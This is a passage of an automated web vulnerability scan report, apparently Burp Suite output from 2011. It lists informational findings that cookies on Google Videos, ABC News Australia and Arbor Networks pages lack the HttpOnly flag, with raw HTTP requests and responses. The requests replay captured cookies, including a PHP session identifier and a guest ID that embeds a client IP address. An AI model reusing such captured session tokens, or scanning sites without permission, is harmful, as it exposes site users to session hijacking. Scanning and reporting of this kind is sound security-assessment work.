Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CTG=1296683999

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:00 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%B^eeiCrrr; path=/; domain=vendorweb.citibank.com; expires=Thu, 02-Feb-2012 22:00:00 GMT; max-age=31536000
Set-Cookie: DM550608DPBRV6=V1rrrrr"rz%B^eeiCrrr%^re^Cz%zrzr"%B^eeiCrrrz%B^eeiCrrr"%B^eeiCrrr"%B^eeiCrrr%^re^C"rz]%6%B^eeiCrrr6%z(xB$5><0xB$':maxB$52f2xBr':maz7}z)O:ma6r"OuKr6%XzA65><06':ma652f2H':mazu::dmIhd; path=/; domain=vendorweb.citibank.com; expires=Thu, 02-Feb-2012 22:00:00 GMT; max-age=31536000
Set-Cookie: CTG=1296684000; path=/; domain=vendorweb.citibank.com; expires=Wed, 09-Feb-2011 22:00:00 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Wed, 02 Feb 2011 22:00:01 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

11.310. http://video.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:05:06 GMT
Expires: Thu, 03 Feb 2011 01:05:06 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=451bdac0aa428edb:TM=1296695106:LM=1296695106:S=qUfuqTtbKJhEKHvk; expires=Sat, 02-Feb-2013 01:05:06 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...

11.311. http://www.abc.net.au/news/stories/2011/01/20/3117032.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /news/stories/2011/01/20/3117032.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/stories/2011/01/20/3117032.htm HTTP/1.1
Host: www.abc.net.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:10:09 GMT
Date: Thu, 03 Feb 2011 01:05:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ABCGuestID=24.143.206.110.73161296695109607; expires=Thu, 03-Feb-2011 01:35:09 GMT; path=/; domain=abc.net.au
Content-Length: 41425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xht
...[SNIP]...

11.312. http://www.abc.net.au/rural/news/content/201102/s3126694.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /rural/news/content/201102/s3126694.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rural/news/content/201102/s3126694.htm HTTP/1.1
Host: www.abc.net.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:10:08 GMT
Date: Thu, 03 Feb 2011 01:05:08 GMT
Content-Length: 10862
Connection: close
Set-Cookie: ABCGuestID=24.143.206.110.73161296695108706; expires=Thu, 03-Feb-2011 01:35:08 GMT; path=/; domain=abc.net.au

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>

<title>Tuna industry seeks lift in quotas, after boom se
...[SNIP]...

11.313. http://www.arbornetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:36:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:36:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:36:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:36:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:36:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.314. http://www.arbornetworks.com/cleanpipes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cleanpipes

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cleanpipes HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:59:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=c241b599226c60ac60d1acf96b4d30a8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:59:11 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:59:11 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:59:12 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:59:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.315. http://www.arbornetworks.com/cn/865.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/865.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cn/865.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=cada0596b6710dfee8c2a5d05d8fb3a3; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:04 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:04 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Thu, 03-Feb-2011 23:56:05 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.316. http://www.arbornetworks.com/cn/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/infrastructure-security-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cn/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=a6fdb64d0958cf0e76e8f0349ee33ebb; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:04 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:04 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Thu, 03-Feb-2011 23:56:05 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:56:10 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.317. http://www.arbornetworks.com/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /contact

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1aff6b01abd27afdd96fe0d2ad40b22b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:55:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:36 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.318. http://www.arbornetworks.com/de/5.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/5.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /de/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9392548e368986818e7ef3684346dbbe; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:39 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:39 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Thu, 03-Feb-2011 23:55:40 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.319. http://www.arbornetworks.com/de/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/infrastructure-security-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /de/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=cda3e494f5a0875e50aa6505ed501e3b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Thu, 03-Feb-2011 23:55:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:42 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.320. http://www.arbornetworks.com/deeppacketinspection  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /deeppacketinspection

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deeppacketinspection HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:59:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=8c9555fafd1fa342be9a991bac0666ca; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:59:01 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:59:01 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:59:02 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:59:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.321. http://www.arbornetworks.com/en/9.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/9.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/9.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=903cef80854226a0d3bbe80a1ab82ead; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:23 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:23 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:24 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:52:24 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.322. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=45d2148a7c2093148f32ecdefe0aac0c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:31 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.323. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-in-action-global-network-security-solution-resources.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e5256e35d9a44c4de92206e7d625016a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:20 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:20 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:21 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.324. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
